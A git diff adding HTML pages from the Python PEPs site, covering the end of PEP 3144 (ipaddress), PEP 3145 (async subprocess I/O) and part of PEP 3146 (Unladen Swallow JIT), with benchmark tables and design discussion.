+
Standards Track
+
Created:
+
06-Feb-2012
+
Python-Version:
+
3.3
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a design and for an IP address manipulation module for +python.

+
+
+

PEP Acceptance

+

This PEP was accepted by Alyssa Coghlan on the 15th of May, 2012.

+
+
+

Motivation

+

Several very good IP address modules for python already exist. +The truth is that all of them struggle with the balance between +adherence to Pythonic principals and the shorthand upon which +network engineers and administrators rely. ipaddress aims to +strike the right balance.

+
+
+

Rationale

+

The existence of several Python IP address manipulation modules is +evidence of an outstanding need for the functionality this module +seeks to provide.

+
+
+

Background

+

PEP 3144 and ipaddr have been up for inclusion before. The +version of the library specified here is backwards incompatible +with the version on PyPI and the one which was discussed before. +In order to avoid confusing users of the current ipaddr, I’ve +renamed this version of the library ipaddress.

+

The main differences between ipaddr and ipaddress are:

+
    +
  • ipaddress *Network classes are equivalent to the ipaddr *Network +class counterparts with the strict flag set to True.
  • +
  • ipaddress *Interface classes are equivalent to the ipaddr +*Network class counterparts with the strict flag set to False.
  • +
  • The factory functions in ipaddress were renamed to disambiguate +them from classes.
  • +
  • A few attributes were renamed to disambiguate their purpose as +well. (eg. network, network_address)
  • +
  • A number of methods and functions which returned containers in ipaddr now +return iterators. This includes subnets, address_exclude, +summarize_address_range and collapse_address_list.
  • +
+

Due to the backwards incompatible API changes between ipaddress and ipaddr, +the proposal is to add the module using the new provisional API status:

+ +

Relevant messages on python-dev:

+ +
+
+

Specification

+

The ipaddr module defines a total of 6 new public classes, 3 for +manipulating IPv4 objects and 3 for manipulating IPv6 objects. +The classes are as follows:

+
    +
  • IPv4Address/IPv6Address - These define individual addresses, for +example the IPv4 address returned by an A record query for +www.google.com (74.125.224.84) or the IPv6 address returned by a +AAAA record query for ipv6.google.com (2001:4860:4001:801::1011).
  • +
  • IPv4Network/IPv6Network - These define networks or groups of +addresses, for example the IPv4 network reserved for multicast use +(224.0.0.0/4) or the IPv6 network reserved for multicast +(ff00::/8, wow, that’s big).
  • +
  • IPv4Interface/IPv6Interface - These hybrid classes refer to an +individual address on a given network. For example, the IPV4 +address 192.0.2.1 on the network 192.0.2.0/24 could be referred to +as 192.0.2.1/24. Likewise, the IPv6 address 2001:DB8::1 on the +network 2001:DB8::/96 could be referred to as 2001:DB8::1/96. +It’s very common to refer to addresses assigned to computer +network interfaces like this, hence the Interface name.
  • +
+

All IPv4 classes share certain characteristics and methods; the +number of bits needed to represent them, whether or not they +belong to certain special IPv4 network ranges, etc. Similarly, +all IPv6 classes share characteristics and methods.

+

ipaddr makes extensive use of inheritance to avoid code +duplication as much as possible. The parent classes are private, +but they are outlined here:

+
    +
  • _IPAddrBase - Provides methods common to all ipaddr objects.
  • +
  • _BaseAddress - Provides methods common to IPv4Address and +IPv6Address.
  • +
  • _BaseInterface - Provides methods common to IPv4Interface and +IPv6Interface, as well as IPv4Network and IPv6Network (ipaddr +treats the Network classes as a special case of Interface).
  • +
  • _BaseV4 - Provides methods and variables (eg, _max_prefixlen) +common to all IPv4 classes.
  • +
  • _BaseV6 - Provides methods and variables common to all IPv6 classes.
  • +
+

Comparisons between objects of differing IP versions results in a +TypeError [1]. Additionally, comparisons of objects with +different _Base parent classes results in a TypeError. The effect +of the _Base parent class limitation is that IPv4Interface’s can +be compared to IPv4Network’s and IPv6Interface’s can be compared +to IPv6Network’s.

+
+
+

Reference Implementation

+

The current reference implementation can be found at:

+

http://code.google.com/p/ipaddress-py/source/browse/ipaddress.py

+

Or see the tarball to include the README and unittests. +http://code.google.com/p/ipaddress-py/downloads/detail?name=ipaddress-1.0.tar.gz

+

More information about using the reference implementation can be +found at: http://code.google.com/p/ipaddr-py/wiki/Using3144

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3144.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3145/index.html b/pep-3145/index.html new file mode 100644 index 00000000000..6d2aef4438c --- /dev/null +++ b/pep-3145/index.html @@ -0,0 +1,273 @@ + + + + + + + + PEP 3145 – Asynchronous I/O For subprocess.Popen | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3145 – Asynchronous I/O For subprocess.Popen

+
+
Author:
+
Eric Pruitt, Charles R. McCreary, Josiah Carlson
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Aug-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

In its present form, the subprocess.Popen implementation is prone to +dead-locking and blocking of the parent Python script while waiting on data +from the child process. This PEP proposes to make +subprocess.Popen more asynchronous to help alleviate these +problems.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +at least until after PEP 3156 has been resolved.

+
+
+

PEP Withdrawal

+

This can be dealt with in the bug tracker. A specific proposal is +attached to [11].

+
+
+

Motivation

+

A search for “python asynchronous subprocess” will turn up numerous +accounts of people wanting to execute a child process and communicate with +it from time to time reading only the data that is available instead of +blocking to wait for the program to produce data [1] [2] [3]. The current +behavior of the subprocess module is that when a user sends or receives +data via the stdin, stderr and stdout file objects, dead locks are common +and documented [4] [5]. While communicate can be used to alleviate some of +the buffering issues, it will still cause the parent process to block while +attempting to read data when none is available to be read from the child +process.

+
+
+

Rationale

+

There is a documented need for asynchronous, non-blocking functionality in +subprocess.Popen [6] [7] [2] [3]. Inclusion of the code would improve the +utility of the Python standard library that can be used on Unix based and +Windows builds of Python. Practically every I/O object in Python has a +file-like wrapper of some sort. Sockets already act as such and for +strings there is StringIO. Popen can be made to act like a file by simply +using the methods attached to the subprocess.Popen.stderr, stdout and +stdin file-like objects. But when using the read and write methods of +those options, you do not have the benefit of asynchronous I/O. In the +proposed solution the wrapper wraps the asynchronous methods to mimic a +file object.

+
+
+

Reference Implementation

+

I have been maintaining a Google Code repository that contains all of my +changes including tests and documentation [9] as well as blog detailing +the problems I have come across in the development process [10].

+

I have been working on implementing non-blocking asynchronous I/O in the +subprocess module as well as a wrapper class for subprocess.Popen +that makes it so that an executed process can take the place of a file by +duplicating all of the methods and attributes that file objects have.

+

There are two base functions that have been added to the subprocess.Popen +class: Popen.send and Popen._recv, each with two separate implementations, +one for Windows and one for Unix-based systems. The Windows +implementation uses ctypes to access the functions needed to control pipes +in the kernel 32 DLL in an asynchronous manner. On Unix based systems, +the Python interface for file control serves the same purpose. The +different implementations of Popen.send and Popen._recv have identical +arguments to make code that uses these functions work across multiple +platforms.

+

When calling the Popen._recv function, it requires the pipe name be +passed as an argument so there exists the Popen.recv function that passes +selects stdout as the pipe for Popen._recv by default. Popen.recv_err +selects stderr as the pipe by default. Popen.recv and Popen.recv_err +are much easier to read and understand than Popen._recv('stdout' ...) and +Popen._recv('stderr' ...) respectively.

+

Since the Popen._recv function does not wait on data to be produced +before returning a value, it may return empty bytes. Popen.asyncread +handles this issue by returning all data read over a given time +interval.

+

The ProcessIOWrapper class uses the asyncread and asyncwrite functions to +allow a process to act like a file so that there are no blocking issues +that can arise from using the stdout and stdin file objects produced from +a subprocess.Popen call.

+
+
+

References

+ +

[8] subprocess.rst - subprocdev - Project Hosting on Google Code + https://web.archive.org/web/20130306074135/http://code.google.com/p/subprocdev/source/browse/doc/subprocess.rst?spec=svn2c925e935cad0166d5da85e37c742d8e7f609de5&r=2c925e935cad0166d5da85e37c742d8e7f609de5

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3145.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3146/index.html b/pep-3146/index.html new file mode 100644 index 00000000000..512c2c2324b --- /dev/null +++ b/pep-3146/index.html @@ -0,0 +1,1788 @@ + + + + + + + + PEP 3146 – Merging Unladen Swallow into CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3146 – Merging Unladen Swallow into CPython

+
+
Author:
+
Collin Winter <collinwinter at google.com>, +Jeffrey Yasskin <jyasskin at google.com>, +Reid Kleckner <rnk at mit.edu>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2010
+
Python-Version:
+
3.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

With Unladen Swallow going the way of the Norwegian Blue [1] +[2], this PEP has been deemed to have been withdrawn.

+
+
+

Abstract

+

This PEP proposes the merger of the Unladen Swallow project [3] into +CPython’s source tree. Unladen Swallow is an open-source branch of CPython +focused on performance. Unladen Swallow is source-compatible with valid Python +2.6.4 applications and C extension modules.

+

Unladen Swallow adds a just-in-time (JIT) compiler to CPython, allowing for the +compilation of selected Python code to optimized machine code. Beyond classical +static compiler optimizations, Unladen Swallow’s JIT compiler takes advantage of +data collected at runtime to make checked assumptions about code behaviour, +allowing the production of faster machine code.

+

This PEP proposes to integrate Unladen Swallow into CPython’s development tree +in a separate py3k-jit branch, targeted for eventual merger with the main +py3k branch. While Unladen Swallow is by no means finished or perfect, we +feel that Unladen Swallow has reached sufficient maturity to warrant +incorporation into CPython’s roadmap. We have sought to create a stable platform +that the wider CPython development team can build upon, a platform that will +yield increasing performance for years to come.

+

This PEP will detail Unladen Swallow’s implementation and how it differs from +CPython 2.6.4; the benchmarks used to measure performance; the tools used to +ensure correctness and compatibility; the impact on CPython’s current platform +support; and the impact on the CPython core development process. The PEP +concludes with a proposed merger plan and brief notes on possible directions +for future work.

+

We seek the following from the BDFL:

+
    +
  • Approval for the overall concept of adding a just-in-time compiler to CPython, +following the design laid out below.
  • +
  • Permission to continue working on the just-in-time compiler in the CPython +source tree.
  • +
  • Permission to eventually merge the just-in-time compiler into the py3k +branch once all blocking issues [31] have been addressed.
  • +
  • A pony.
  • +
+
+
+

Rationale, Implementation

+

Many companies and individuals would like Python to be faster, to enable its +use in more projects. Google is one such company.

+

Unladen Swallow is a Google-sponsored branch of CPython, initiated to improve +the performance of Google’s numerous Python libraries, tools and applications. +To make the adoption of Unladen Swallow as easy as possible, the project +initially aimed at four goals:

+
    +
  • A performance improvement of 5x over the baseline of CPython 2.6.4 for +single-threaded code.
  • +
  • 100% source compatibility with valid CPython 2.6 applications.
  • +
  • 100% source compatibility with valid CPython 2.6 C extension modules.
  • +
  • Design for eventual merger back into CPython.
  • +
+

We chose 2.6.4 as our baseline because Google uses CPython 2.4 internally, and +jumping directly from CPython 2.4 to CPython 3.x was considered infeasible.

+

To achieve the desired performance, Unladen Swallow has implemented a +just-in-time (JIT) compiler [51] in the tradition of Urs Hoelzle’s work on +Self [52], gathering feedback at runtime and using that to inform +compile-time optimizations. This is similar to the approach taken by the current +breed of JavaScript engines [59], [60]; most Java virtual +machines [64]; Rubinius [61], MacRuby [63], and other Ruby +implementations; Psyco [65]; and others.

+

We explicitly reject any suggestion that our ideas are original. We have sought +to reuse the published work of other researchers wherever possible. If we have +done any original work, it is by accident. We have tried, as much as possible, +to take good ideas from all corners of the academic and industrial community. A +partial list of the research papers that have informed Unladen Swallow is +available on the Unladen Swallow wiki [54].

+

The key observation about optimizing dynamic languages is that they are only +dynamic in theory; in practice, each individual function or snippet of code is +relatively static, using a stable set of types and child functions. The current +CPython bytecode interpreter assumes the worst about the code it is running, +that at any moment the user might override the len() function or pass a +never-before-seen type into a function. In practice this never happens, but user +code pays for that support. Unladen Swallow takes advantage of the relatively +static nature of user code to improve performance.

+

At a high level, the Unladen Swallow JIT compiler works by translating a +function’s CPython bytecode to platform-specific machine code, using data +collected at runtime, as well as classical compiler optimizations, to improve +the quality of the generated machine code. Because we only want to spend +resources compiling Python code that will actually benefit the runtime of the +program, an online heuristic is used to assess how hot a given function is. Once +the hotness value for a function crosses a given threshold, it is selected for +compilation and optimization. Until a function is judged hot, however, it runs +in the standard CPython eval loop, which in Unladen Swallow has been +instrumented to record interesting data about each bytecode executed. This +runtime data is used to reduce the flexibility of the generated machine code, +allowing us to optimize for the common case. For example, we collect data on

+
    +
  • Whether a branch was taken/not taken. If a branch is never taken, we will not +compile it to machine code.
  • +
  • Types used by operators. If we find that a + b is only ever adding +integers, the generated machine code for that snippet will not support adding +floats.
  • +
  • Functions called at each callsite. If we find that a particular foo() +callsite is always calling the same foo function, we can optimize the +call or inline it away
  • +
+

Refer to [55] for a complete list of data points gathered and how +they are used.

+

However, if by chance the historically-untaken branch is now taken, or some +integer-optimized a + b snippet receives two strings, we must support this. +We cannot change Python semantics. Each of these sections of optimized machine +code is preceded by a guard, which checks whether the simplifying +assumptions we made when optimizing still hold. If the assumptions are still +valid, we run the optimized machine code; if they are not, we revert back to +the interpreter and pick up where we left off.

+

We have chosen to reuse a set of existing compiler libraries called LLVM +[4] for code generation and code optimization. This has saved our small +team from needing to understand and debug code generation on multiple machine +instruction sets and from needing to implement a large set of classical compiler +optimizations. The project would not have been possible without such code reuse. +We have found LLVM easy to modify and its community receptive to our suggestions +and modifications.

+

In somewhat more depth, Unladen Swallow’s JIT works by compiling CPython +bytecode to LLVM’s own intermediate representation (IR) [95], taking +into account any runtime data from the CPython eval loop. We then run a set of +LLVM’s built-in optimization passes, producing a smaller, optimized version of +the original LLVM IR. LLVM then lowers the IR to platform-specific machine code, +performing register allocation, instruction scheduling, and any necessary +relocations. This arrangement of the compilation pipeline allows the LLVM-based +JIT to be easily omitted from a compiled python binary by passing +--without-llvm to ./configure; various use cases for this flag are +discussed later.

+

For a complete detailing of how Unladen Swallow works, consult the Unladen +Swallow documentation [53], [55].

+

Unladen Swallow has focused on improving the performance of single-threaded, +pure-Python code. We have not made an effort to remove CPython’s global +interpreter lock (GIL); we feel this is separate from our work, and due to its +sensitivity, is best done in a mainline development branch. We considered +making GIL-removal a part of Unladen Swallow, but were concerned by the +possibility of introducing subtle bugs when porting our work from CPython 2.6 +to 3.x.

+

A JIT compiler is an extremely versatile tool, and we have by no means +exhausted its full potential. We have tried to create a sufficiently flexible +framework that the wider CPython development community can build upon it for +years to come, extracting increased performance in each subsequent release.

+
+

Alternatives

+

There are number of alternative strategies for improving Python performance +which we considered, but found unsatisfactory.

+
    +
  • Cython, Shedskin: Cython [102] and Shedskin [103] are both +static compilers for Python. We view these as useful-but-limited workarounds +for CPython’s historically-poor performance. Shedskin does not support the +full Python standard library [104], while Cython +requires manual Cython-specific annotations for optimum performance.

    Static compilers like these are useful for writing extension modules without +worrying about reference counting, but because they are static, ahead-of-time +compilers, they cannot optimize the full range of code under consideration by +a just-in-time compiler informed by runtime data.

    +
  • +
  • IronPython: IronPython [107] is Python on Microsoft’s .Net +platform. It is not actively tested on Mono [108], meaning that it is +essentially Windows-only, making it unsuitable as a general CPython +replacement.
  • +
  • Jython: Jython [109] is a complete implementation of Python 2.5, but +is significantly slower than Unladen Swallow (3-5x on measured benchmarks) and +has no support for CPython extension modules [110], which would +make migration of large applications prohibitively expensive.
  • +
  • Psyco: Psyco [65] is a specializing JIT compiler for CPython, +implemented as an extension module. It primarily improves performance for +numerical code. Pros: exists; makes some code faster. Cons: 32-bit only, with +no plans for 64-bit support; supports x86 only; very difficult to maintain; +incompatible with SSE2 optimized code due to alignment issues.
  • +
  • PyPy: PyPy [66] has good performance on numerical code, but is slower +than Unladen Swallow on some workloads. Migration of large applications from +CPython to PyPy would be prohibitively expensive: PyPy’s JIT compiler supports +only 32-bit x86 code generation; important modules, such as MySQLdb and +pycrypto, do not build against PyPy; PyPy does not offer an embedding API, +much less the same API as CPython.
  • +
  • PyV8: PyV8 [111] is an alpha-stage experimental Python-to-JavaScript +compiler that runs on top of V8. PyV8 does not implement the whole Python +language, and has no support for CPython extension modules.
  • +
  • WPython: WPython [105] is a wordcode-based reimplementation of +CPython’s interpreter loop. While it provides a modest improvement to +interpreter performance [106], it is not an either-or +substitute for a just-in-time compiler. An interpreter will never be as fast +as optimized machine code. We view WPython and similar interpreter +enhancements as complementary to our work, rather than as competitors.
  • +
+
+
+
+

Performance

+
+

Benchmarks

+

Unladen Swallow has developed a fairly large suite of benchmarks, ranging from +synthetic microbenchmarks designed to test a single feature up through +whole-application macrobenchmarks. The inspiration for these benchmarks has come +variously from third-party contributors (in the case of the html5lib +benchmark), Google’s own internal workloads (slowspitfire, pickle, +unpickle), as well as tools and libraries in heavy use throughout the wider +Python community (django, 2to3, spambayes). These benchmarks are run +through a single interface called perf.py that takes care of collecting +memory usage information, graphing performance, and running statistics on the +benchmark results to ensure significance.

+

The full list of available benchmarks is available on the Unladen Swallow wiki +[43], including instructions on downloading and running the +benchmarks for yourself. All our benchmarks are open-source; none are +Google-proprietary. We believe this collection of benchmarks serves as a useful +tool to benchmark any complete Python implementation, and indeed, PyPy is +already using these benchmarks for their own performance testing +[81], [96]. We welcome this, and we seek +additional workloads for the benchmark suite from the Python community.

+

We have focused our efforts on collecting macrobenchmarks and benchmarks that +simulate real applications as well as possible, when running a whole application +is not feasible. Along a different axis, our benchmark collection originally +focused on the kinds of workloads seen by Google’s Python code (webapps, text +processing), though we have since expanded the collection to include workloads +Google cares nothing about. We have so far shied away from heavily numerical +workloads, since NumPy [80] already does an excellent job on such code and +so improving numerical performance was not an initial high priority for the +team; we have begun to incorporate such benchmarks into the collection +[97] and have started work on optimizing numerical Python code.

+

Beyond these benchmarks, there are also a variety of workloads we are explicitly +not interested in benchmarking. Unladen Swallow is focused on improving the +performance of pure-Python code, so the performance of extension modules like +NumPy is uninteresting since NumPy’s core routines are implemented in +C. Similarly, workloads that involve a lot of IO like GUIs, databases or +socket-heavy applications would, we feel, fail to accurately measure interpreter +or code generation optimizations. That said, there’s certainly room to improve +the performance of C-language extensions modules in the standard library, and +as such, we have added benchmarks for the cPickle and re modules.

+
+
+

Performance vs CPython 2.6.4

+

The charts below compare the arithmetic mean of multiple benchmark iterations +for CPython 2.6.4 and Unladen Swallow. perf.py gathers more data than this, +and indeed, arithmetic mean is not the whole story; we reproduce only the mean +for the sake of conciseness. We include the t score from the Student’s +two-tailed T-test [44] at the 95% confidence interval to indicate +the significance of the result. Most benchmarks are run for 100 iterations, +though some longer-running whole-application benchmarks are run for fewer +iterations.

+

A description of each of these benchmarks is available on the Unladen Swallow +wiki [43].

+

Command:

+
./perf.py -r -b default,apps ../a/python ../b/python
+
+
+

32-bit; gcc 4.0.3; Ubuntu Dapper; Intel Core2 Duo 6600 @ 2.4GHz; 2 cores; 4MB L2 cache; 4GB RAM

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
BenchmarkCPython 2.6.4Unladen Swallow r988ChangeSignificanceTimeline
2to325.13 s24.87 s1.01x fastert=8.94http://tinyurl.com/yamhrpg
django1.08 s0.80 s1.35x fastert=315.59http://tinyurl.com/y9mrn8s
html5lib14.29 s13.20 s1.08x fastert=2.17http://tinyurl.com/y8tyslu
nbody0.51 s0.28 s1.84x fastert=78.007http://tinyurl.com/y989qhg
rietveld0.75 s0.55 s1.37x fasterInsignificanthttp://tinyurl.com/ye7mqd3
slowpickle0.75 s0.55 s1.37x fastert=20.78http://tinyurl.com/ybrsfnd
slowspitfire0.83 s0.61 s1.36x fastert=2124.66http://tinyurl.com/yfknhaw
slowunpickle0.33 s0.26 s1.26x fastert=15.12http://tinyurl.com/yzlakoo
spambayes0.31 s0.34 s1.10x slowerInsignificanthttp://tinyurl.com/yem62ub
+

64-bit; gcc 4.2.4; Ubuntu Hardy; AMD Opteron 8214 HE @ 2.2 GHz; 4 cores; 1MB L2 cache; 8GB RAM

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
BenchmarkCPython 2.6.4Unladen Swallow r988ChangeSignificanceTimeline
2to331.98 s30.41 s1.05x fastert=8.35http://tinyurl.com/ybcrl3b
django1.22 s0.94 s1.30x fastert=106.68http://tinyurl.com/ybwqll6
html5lib18.97 s17.79 s1.06x fastert=2.78http://tinyurl.com/yzlyqvk
nbody0.77 s0.27 s2.86x fastert=133.49http://tinyurl.com/yeyqhbg
rietveld0.74 s0.80 s1.08x slowert=-2.45http://tinyurl.com/yzjc6ff
slowpickle0.91 s0.62 s1.48x fastert=28.04http://tinyurl.com/yf7en6k
slowspitfire1.01 s0.72 s1.40x fastert=98.70http://tinyurl.com/yc8pe2o
slowunpickle0.51 s0.34 s1.51x fastert=32.65http://tinyurl.com/yjufu4j
spambayes0.43 s0.45 s1.06x slowerInsignificanthttp://tinyurl.com/yztbjfp
+

Many of these benchmarks take a hit under Unladen Swallow because the current +version blocks execution to compile Python functions down to machine code. This +leads to the behaviour seen in the timeline graphs for the html5lib and +rietveld benchmarks, for example, and slows down the overall performance of +2to3. We have an active development branch to fix this problem +([46], [47]), but working within +the strictures of CPython’s current threading system has complicated the process +and required far more care and time than originally anticipated. We view this +issue as critical to final merger into the py3k branch.

+

We have obviously not met our initial goal of a 5x performance improvement. A +performance retrospective follows, which addresses why we failed to meet our +initial performance goal. We maintain a list of yet-to-be-implemented +performance work [50].

+
+
+

Memory Usage

+

The following table shows maximum memory usage (in kilobytes) for each of +Unladen Swallow’s default benchmarks for both CPython 2.6.4 and Unladen Swallow +r988, as well as a timeline of memory usage across the lifetime of the +benchmark. We include tables for both 32- and 64-bit binaries. Memory usage was +measured on Linux 2.6 systems by summing the Private_ sections from the +kernel’s /proc/$pid/smaps pseudo-files [45].

+

Command:

+
./perf.py -r --track_memory -b default,apps ../a/python ../b/python
+
+
+

32-bit

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
BenchmarkCPython 2.6.4Unladen Swallow r988ChangeTimeline
2to326396 kb46896 kb1.77xhttp://tinyurl.com/yhr2h4z
django10028 kb27740 kb2.76xhttp://tinyurl.com/yhan8vs
html5lib150028 kb173924 kb1.15xhttp://tinyurl.com/ybt44en
nbody3020 kb16036 kb5.31xhttp://tinyurl.com/ya8hltw
rietveld15008 kb46400 kb3.09xhttp://tinyurl.com/yhd5dra
slowpickle4608 kb16656 kb3.61xhttp://tinyurl.com/ybukyvo
slowspitfire85776 kb97620 kb1.13xhttp://tinyurl.com/y9vj35z
slowunpickle3448 kb13744 kb3.98xhttp://tinyurl.com/yexh4d5
spambayes7352 kb46480 kb6.32xhttp://tinyurl.com/yem62ub
+

64-bit

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
BenchmarkCPython 2.6.4Unladen Swallow r988ChangeTimeline
2to351596 kb82340 kb1.59xhttp://tinyurl.com/yljg6rs
django16020 kb38908 kb2.43xhttp://tinyurl.com/ylqsebh
html5lib259232 kb324968 kb1.25xhttp://tinyurl.com/yha6oee
nbody4296 kb23012 kb5.35xhttp://tinyurl.com/yztozza
rietveld24140 kb73960 kb3.06xhttp://tinyurl.com/ybg2nq7
slowpickle4928 kb23300 kb4.73xhttp://tinyurl.com/yk5tpbr
slowspitfire133276 kb148676 kb1.11xhttp://tinyurl.com/y8bz2xe
slowunpickle4896 kb16948 kb3.46xhttp://tinyurl.com/ygywwoc
spambayes10728 kb84992 kb7.92xhttp://tinyurl.com/yhjban5
+

The increased memory usage comes from a) LLVM code generation, analysis and +optimization libraries; b) native code; c) memory usage issues or leaks in +LLVM; d) data structures needed to optimize and generate machine code; e) +as-yet uncategorized other sources.

+

While we have made significant progress in reducing memory usage since the +initial naive JIT implementation [42], there is obviously more +to do. We believe that there are still memory savings to be made without +sacrificing performance. We have tended to focus on raw performance, and we +have not yet made a concerted push to reduce memory usage. We view reducing +memory usage as a blocking issue for final merger into the py3k branch. We +seek guidance from the community on an acceptable level of increased memory +usage.

+
+
+

Start-up Time

+

Statically linking LLVM’s code generation, analysis and optimization libraries +increases the time needed to start the Python binary. C++ static initializers +used by LLVM also increase start-up time, as does importing the collection of +pre-compiled C runtime routines we want to inline to Python code.

+

Results from Unladen Swallow’s startup benchmarks:

+
$ ./perf.py -r -b startup /tmp/cpy-26/bin/python /tmp/unladen/bin/python
+
+### normal_startup ###
+Min: 0.219186 -> 0.352075: 1.6063x slower
+Avg: 0.227228 -> 0.364384: 1.6036x slower
+Significant (t=-51.879098, a=0.95)
+Stddev: 0.00762 -> 0.02532: 3.3227x larger
+Timeline: http://tinyurl.com/yfe8z3r
+
+### startup_nosite ###
+Min: 0.105949 -> 0.264912: 2.5004x slower
+Avg: 0.107574 -> 0.267505: 2.4867x slower
+Significant (t=-703.557403, a=0.95)
+Stddev: 0.00214 -> 0.00240: 1.1209x larger
+Timeline: http://tinyurl.com/yajn8fa
+
+### bzr_startup ###
+Min: 0.067990 -> 0.097985: 1.4412x slower
+Avg: 0.084322 -> 0.111348: 1.3205x slower
+Significant (t=-37.432534, a=0.95)
+Stddev: 0.00793 -> 0.00643: 1.2330x smaller
+Timeline: http://tinyurl.com/ybdm537
+
+### hg_startup ###
+Min: 0.016997 -> 0.024997: 1.4707x slower
+Avg: 0.026990 -> 0.036772: 1.3625x slower
+Significant (t=-53.104502, a=0.95)
+Stddev: 0.00406 -> 0.00417: 1.0273x larger
+Timeline: http://tinyurl.com/ycout8m
+
+
+

bzr_startup and hg_startup measure how long it takes Bazaar and +Mercurial, respectively, to display their help screens. startup_nosite +runs python -S many times; usage of the -S option is rare, but we feel +this gives a good indication of where increased startup time is coming from.

+

Unladen Swallow has made headway toward optimizing startup time, but there is +still more work to do and further optimizations to implement. Improving start-up +time is a high-priority item [33] in Unladen Swallow’s +merger punchlist.

+
+
+

Binary Size

+

Statically linking LLVM’s code generation, analysis and optimization libraries +significantly increases the size of the python binary. The tables below +report stripped on-disk binary sizes; the binaries are stripped to better +correspond with the configurations used by system package managers. We feel this +is the most realistic measure of any change in binary size.

+ + + + + + + + + + + + + + + + + + + + +
Binary sizeCPython 2.6.4CPython 3.1.1Unladen Swallow r1041
32-bit1.3M1.4M12M
64-bit1.6M1.6M12M
+

The increased binary size is caused by statically linking LLVM’s code +generation, analysis and optimization libraries into the python binary. +This can be straightforwardly addressed by modifying LLVM to better support +shared linking and then using that, instead of the current static linking. For +the moment, though, static linking provides an accurate look at the cost of +linking against LLVM.

+

Even when statically linking, we believe there is still headroom to improve +on-disk binary size by narrowing Unladen Swallow’s dependencies on LLVM. This +issue is actively being addressed [32].

+
+
+

Performance Retrospective

+

Our initial goal for Unladen Swallow was a 5x performance improvement over +CPython 2.6. We did not hit that, nor to put it bluntly, even come close. Why +did the project not hit that goal, and can an LLVM-based JIT ever hit that goal?

+

Why did Unladen Swallow not achieve its 5x goal? The primary reason was +that LLVM required more work than we had initially anticipated. Based on the +fact that Apple was shipping products based on LLVM [82], and +other high-level languages had successfully implemented LLVM-based JITs +([61], [63], [83]), we had assumed that LLVM’s JIT was +relatively free of show-stopper bugs.

+

That turned out to be incorrect. We had to turn our attention away from +performance to fix a number of critical bugs in LLVM’s JIT infrastructure (for +example, [84], [85]) as well as a number of +nice-to-have enhancements that would enable further optimizations along various +axes (for example, [87], +[86], [88]). LLVM’s static code generation +facilities, tools and optimization passes are stable and stress-tested, but the +just-in-time infrastructure was relatively untested and buggy. We have fixed +this.

+

(Our hypothesis is that we hit these problems – problems other projects had +avoided – because of the complexity and thoroughness of CPython’s standard +library test suite.)

+

We also diverted engineering effort away from performance and into support tools +such as gdb and oProfile. gdb did not work well with JIT compilers at all, and +LLVM previously had no integration with oProfile. Having JIT-aware debuggers and +profilers has been very valuable to the project, and we do not regret +channeling our time in these directions. See the Debugging and Profiling +sections for more information.

+

Can an LLVM-based CPython JIT ever hit the 5x performance target? The benchmark +results for JIT-based JavaScript implementations suggest that 5x is indeed +possible, as do the results PyPy’s JIT has delivered for numeric workloads. The +experience of Self-92 [52] is also instructive.

+

Can LLVM deliver this? We believe that we have only begun to scratch the surface +of what our LLVM-based JIT can deliver. The optimizations we have incorporated +into this system thus far have borne significant fruit (for example, +[89], [90], +[91]). Our experience to date is that the limiting factor +on Unladen Swallow’s performance is the engineering cycles needed to implement +the literature. We have found LLVM easy to work with and to modify, and its +built-in optimizations have greatly simplified the task of implementing +Python-level optimizations.

+

An overview of further performance opportunities is discussed in the +Future Work section.

+
+
+
+

Correctness and Compatibility

+

Unladen Swallow’s correctness test suite includes CPython’s test suite (under +Lib/test/), as well as a number of important third-party applications and +libraries [6]. A full list of these applications and libraries is +reproduced below. Any dependencies needed by these packages, such as +zope.interface [34], are also tested indirectly as a part of +testing the primary package, thus widening the corpus of tested third-party +Python code.

+
    +
  • 2to3
  • +
  • Cheetah
  • +
  • cvs2svn
  • +
  • Django
  • +
  • Nose
  • +
  • NumPy
  • +
  • PyCrypto
  • +
  • pyOpenSSL
  • +
  • PyXML
  • +
  • Setuptools
  • +
  • SQLAlchemy
  • +
  • SWIG
  • +
  • SymPy
  • +
  • Twisted
  • +
  • ZODB
  • +
+

These applications pass all relevant tests when run under Unladen Swallow. Note +that some tests that failed against our baseline of CPython 2.6.4 were disabled, +as were tests that made assumptions about CPython internals such as exact +bytecode numbers or bytecode format. Any package with disabled tests includes +a README.unladen file that details the changes (for example, +[37]).

+

In addition, Unladen Swallow is tested automatically against an array of +internal Google Python libraries and applications. These include Google’s +internal Python bindings for BigTable [35], the Mondrian code review +application [36], and Google’s Python standard library, among others. +The changes needed to run these projects under Unladen Swallow have consistently +broken into one of three camps:

+
    +
